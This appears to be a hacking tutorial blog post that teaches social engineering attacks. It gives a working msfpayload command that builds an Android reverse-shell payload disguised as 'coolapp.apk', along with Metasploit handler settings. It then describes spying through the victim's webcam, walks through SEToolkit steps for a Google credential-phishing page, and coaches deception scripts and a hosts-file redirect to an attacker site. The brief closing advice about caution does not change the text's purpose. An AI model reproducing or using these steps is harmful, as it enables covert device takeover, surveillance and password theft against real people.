Today I am going to teach the various ways that you can use social engineering to hack a system. For those of you that have followed my past tutorials, you know that social engineering can unlock a world of possibilities. This is because no matter how many firewalls, no matter how many patches there are on a server, the password is kept in the minds of people...and people, are not as smart as computers.
As I say in all of my social engineering tutorials, the secret is simple. Convincing the other person that you have more power than them. Convincing the other person that they should trust you with their private information. This can be accomplished by pretending to be someone you're not.
Social Engineering has existed as far back as the first cavemen. It has been demonstrated through history in famous wars, like the trojan horse, which is now I popular name for a virus. In the next step we are going to look at the different ways we can get information from people.
The goal of any social engineering attack should be to grant you access to information that would otherwise be unauthorized. Below is a list of ways we can get information from a target:
- Convince the target to download a virus
Convincing a target to download a virus would give us access to their entire machine. From their we could turn on their webcam, look at their messages, turn on a key logger, and much more. However, this method has a few flaws. If the target finds out the virus, we could be in big trouble.
- Convincing the target to login to a false website (phishing)
Convincing the target to login to a false website, also known as "phishing", is an easy way to get a target's password. The hardest part of this method is convincing the target to login. Unlike downloading an app, a target is most likely going to see that the url is not the same as the regular url, and refuse to login. There are ways around this however. Altering the target's host file could allow us to swap websites. For instance, when the target goes to www.facebook.com, it would redirect to www.evilwebsite.com. The problem with altering the host file is that we need physical access to the machine.
- Convincing the target that we are their boss
This method is typically used for companies. I dove into deep detail with this method in my past tutorial of "How To Use Social Engineering to Find Out More Information About A Company". This method involves calling the target, and convincing them that we are the Corporate Office. If you are convincing enough, you can tell them to do ANYTHING. It's pretty funny actually.
In the next few steps we will dive into further detail with phishing and viruses. We will be using Kali Linux for the next part but if you don't have Kali Linux, make sure you have Metasploit and the Social Engineering Toolkit.
Now is where we get technical. For the sake of this tutorial we will be making a simple virus to deploy on our target's android phone. We will assume that you are on the same network as the target, and if you are not, you should check out another tutorial for port forwarding.
First let's start the Metasploit services. To do this, simply type:
service postgresql start
And the second command is:
service metasploit start
Once the services are running, we can start building our exploit. Let's first make the payload. We will have a payload for android that will open a meterpreter session connecting to our computer through port 8080. To do this, type:
msfpayload android/meterpreter/reverse_tcp LHOST=(your ip address) LPORT=8080 R > /root/Desktop/coolapp.apk
Now we should have a payload on the desktop called "coolapp.apk". Now we need to setup a handler to open the meterpreter session in our terminal. To do this we need to open the Metasploit console. Do this by typing:
Wait until the console opens. When the console opens, type the following in the order that I type them:
set payload android/meterpreter/reverse_tcp
set lhost (your ip address)
set lport 8080
Once you have typed all these commands in this order, you should be ready to exploit. Now the rest is social engineering. Tell your target that you have found a really cool app that will show a picture of a customized diamond if you answer enough cool questions. Make something up, have a little fun. Once you convince them to download your app, send them the coolapp.apk that you created on the desktop. Do not close the terminal yet. When they have the app and are ready to open it, type:
This should now open a listener and when the target opens the file, you should have a meterpreter session open. From here you can type the following commands:
This command will give you a little list of the webcams in numeric order.
This command will take a picture on the target's webcam. For android if you put the number as 1, it will take a picture on the back facing camera and if you put the number as 2, it will take a picture on the front facing camera.
This will display more commands and what they will do. For the sake of this tutorial I will let you explore the rest on your own.
In the next step we will discuss phishing with the Social Engineering Toolkit.
Phishing with Kali Linux is much easier to set up. For simplicity, we will create a google phishing page that our target will connect to, and enter their credentials. First let's open our terminal, and type:
This command will open the window for Social Engineering Toolkit.
The way Social Engineering Toolkit is setup allows us to type a number to proceed to the next step. The numbers that we will be typing, in this order are:
1, 2, 3, 1
Now it should ask you what ip you are using. This should be your local IP. To find this, open a new terminal, and type:
This should display your ip address. Copy this address and paste it back in SEToolkit and hit enter. Now it will ask you what template you are choosing. Choose 2 for google and hit enter. Now it should all start up and run. If it says some stuff about apache, hit control c and edit the config file so apache is turned off. Now convince your target to log in to your local ip address either by shortening the url with a google url shortener, or just telling him or her that your super duper awesome website uses google to connect people.
So you have learned about social engineering and how it relates to computers. From here I hope you raise your guard to people who offer you websites and apps and make sure you never ever download anything from a source you can't verify. Thanks and as always comment if you have any concerns! :D